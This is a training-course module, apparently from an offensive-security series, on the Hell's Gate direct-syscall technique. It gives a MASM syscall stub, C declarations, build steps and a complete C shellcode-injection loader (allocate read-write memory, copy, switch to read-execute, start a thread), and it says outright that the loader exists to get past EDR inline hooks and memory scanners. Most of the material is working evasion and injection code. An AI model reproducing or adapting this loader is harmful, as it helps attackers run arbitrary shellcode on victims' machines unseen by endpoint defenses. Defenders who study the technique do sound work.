Module 6: Direct Syscall Execution
You have the number. Now invoke the gate.
Putting It All Together
In the previous module, we resolved SSNs from ntdll stubs. Now we use those SSNs to execute system calls directly, without ever calling through ntdll.dll. This module covers the Hell's Gate assembly stub, how the SSN is set dynamically at runtime, the calling convention bridge between C and the ASM stub, and a complete working example.
The Hell's Gate Assembly Stub
Hell's Gate uses a small assembly function that serves as a reusable syscall trampoline. The SSN is set before calling this stub, and the stub simply moves it into EAX and executes syscall:
ASM; Hell's Gate ASM stub (hellsgate.asm - MASM syntax)
; This file defines two functions:
; HellsGate - stores the SSN for the next syscall
; HellDescent - executes the syscall with the stored SSN
.data
wSystemCall DWORD 0h ; Global variable to hold the current SSN
.code
; HellsGate: Set the SSN for the next syscall
; Param: WORD wSSN (passed in ECX on x64)
HellsGate PROC
mov wSystemCall, 000h ; Zero the SSN (clean state)
mov wSystemCall, ecx ; Store the SSN in the global variable
ret
HellsGate ENDP
; HellDescent: Execute the syscall
; Params: Same as the target Nt* function (passed in RCX, RDX, R8, R9, stack)
HellDescent PROC
mov r10, rcx ; Save 1st param (syscall clobbers RCX)
mov eax, wSystemCall ; Load the SSN from our global variable
syscall ; Ring 3 -> Ring 0
ret ; Return NTSTATUS in RAX
HellDescent ENDP
END
Two-Step Invocation
Hell's Gate uses a two-function pattern: first call HellsGate(ssn) to set the syscall number, then call HellDescent(params...) to execute the syscall. This design means the SSN is stored in a global variable between the two calls. The alternative (passing the SSN as an extra parameter to a single function) would shift all the real parameters and break the calling convention alignment. The two-step approach keeps the parameter layout identical to the original Nt* function signature.
C Function Declarations
To call the assembly functions from C, Hell's Gate declares them as external functions with the appropriate signatures:
C// External declarations for the ASM stubs (from main.c)
extern VOID HellsGate(WORD wSystemCall);
extern NTSTATUS HellDescent(...);
// The HellDescent function uses varargs (...) because it serves as
// a generic syscall stub. The actual parameters depend on which
// Nt* function you're invoking.
// Usage pattern:
// 1. Call HellsGate(ssn) to set the SSN
// 2. Call HellDescent(param1, param2, ...) with the Nt* function's parameters
// 3. HellDescent returns the NTSTATUS result
The x64 Calling Convention
Understanding the x64 calling convention is essential for direct syscalls. The Windows x64 ABI passes the first four integer/pointer parameters in registers:
| Parameter | Register | After mov r10, rcx |
|---|---|---|
| 1st parameter | RCX | Moved to R10 (kernel reads from R10) |
| 2nd parameter | RDX | Stays in RDX |
| 3rd parameter | R8 | Stays in R8 |
| 4th parameter | R9 | Stays in R9 |
| 5th+ parameters | Stack | Remain on the stack |
When HellDescent is called from C, the compiler sets up registers and stack exactly as if calling the real Nt* function. The assembly stub then does mov r10, rcx (matching what ntdll does) and executes syscall. The kernel sees the same register layout it would see from a normal ntdll call.
Direct Syscall Execution Flow
HellsGate(ssn)in global var
HellDescent(args)mov eax,SSN
syscall
NTSTATUS
Complete Working Example
Here is how Hell's Gate uses the resolved SSNs to perform a classic shellcode injection sequence. This demonstrates the entire chain from SSN resolution to syscall execution:
C// From main.c - Shellcode execution using resolved syscalls
// (VX_TABLE 'Table' has been populated by GetVxTableEntry calls)
// Step 1: Allocate RW memory for shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(Table.NtAllocateVirtualMemory.wSystemCall);
NTSTATUS status = HellDescent(
(HANDLE)-1, // ProcessHandle: current process (NtCurrentProcess)
&lpAddress, // BaseAddress: let the system choose
0, // ZeroBits
&sDataSize, // RegionSize: size of shellcode
MEM_COMMIT | MEM_RESERVE, // AllocationType
PAGE_READWRITE // Protect: RW (not RWX -- safer)
);
// Step 2: Copy shellcode into allocated memory
// (Using VirtualAlloc'd RW memory, simple memcpy)
memcpy(lpAddress, shellcode, sizeof(shellcode));
// Step 3: Change protection to RX (execute + read, no write)
DWORD dwOldProtect = 0;
HellsGate(Table.NtProtectVirtualMemory.wSystemCall);
status = HellDescent(
(HANDLE)-1, // ProcessHandle
&lpAddress, // BaseAddress
&sDataSize, // NumberOfBytesToProtect
PAGE_EXECUTE_READ, // NewAccessProtection: RX
&dwOldProtect // OldAccessProtection
);
// Step 4: Create a thread to execute the shellcode
HANDLE hThread = NULL;
HellsGate(Table.NtCreateThreadEx.wSystemCall);
status = HellDescent(
&hThread, // ThreadHandle (output)
THREAD_ALL_ACCESS, // DesiredAccess
NULL, // ObjectAttributes
(HANDLE)-1, // ProcessHandle: current process
lpAddress, // StartRoutine: shellcode address
NULL, // Argument
FALSE, // CreateFlags: not suspended
0, // ZeroBits
0, // StackSize
0, // MaximumStackSize
NULL // AttributeList
);
// Step 5: Wait for the thread to finish
LARGE_INTEGER Timeout = { 0 };
HellsGate(Table.NtWaitForSingleObject.wSystemCall);
status = HellDescent(
hThread, // Handle
FALSE, // Alertable
NULL // Timeout (NULL = infinite)
);
What EDR Hooks Miss
In this execution flow, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject are never called through ntdll.dll. The EDR's inline hooks on those functions are completely bypassed. The kernel receives and processes the syscalls normally, but the EDR's userland hooks never fire because execution never passes through the hooked code.
The W+X Strategy
Notice the two-step memory permission approach in the example above: first allocate as RW (writable, for copying shellcode), then change to RX (executable, for running it). This is called W^X (Write XOR Execute) and avoids the RWX red flag that memory scanners look for. At no point is the memory simultaneously writable and executable.
| Step | Permission | Purpose |
|---|---|---|
| Allocate | PAGE_READWRITE (RW) | Allows writing shellcode into the buffer |
| Copy | RW | memcpy shellcode bytes |
| Protect | PAGE_EXECUTE_READ (RX) | Makes code executable, removes write |
| Execute | RX | Thread starts executing shellcode |
Compiling and Linking
The Hell's Gate project requires compiling C code and assembling the MASM file, then linking them together. The assembly file (hellsgate.asm) is compiled with the Microsoft Macro Assembler (ml64) and linked with the C object files:
C// Build process (Visual Studio / MSVC):
// 1. hellsgate.asm -> ml64.exe /c hellsgate.asm -> hellsgate.obj
// 2. main.c -> cl.exe /c main.c -> main.obj
// 3. Link: -> link.exe main.obj hellsgate.obj -> hellsgate.exe
// In Visual Studio:
// - Add hellsgate.asm to project
// - Right-click -> Properties -> Item Type: "Microsoft Macro Assembler"
// - Build as x64 Release (ASM uses x64-only instructions)
Why Inline Assembly Does Not Work
MSVC does not support inline assembly (__asm) in x64 builds. This is why Hell's Gate uses a separate .asm file with MASM syntax. Some projects use compiler intrinsics or embed raw bytes, but a separate ASM file is the cleanest approach and allows proper debugging.
Pop Quiz: Direct Syscall Execution
Q1: Why does Hell's Gate use two separate functions (HellsGate + HellDescent) instead of one?
Q2: In the HellDescent assembly stub, what does mov r10, rcx do?
Q3: Why does the example allocate memory as PAGE_READWRITE first, then change to PAGE_EXECUTE_READ?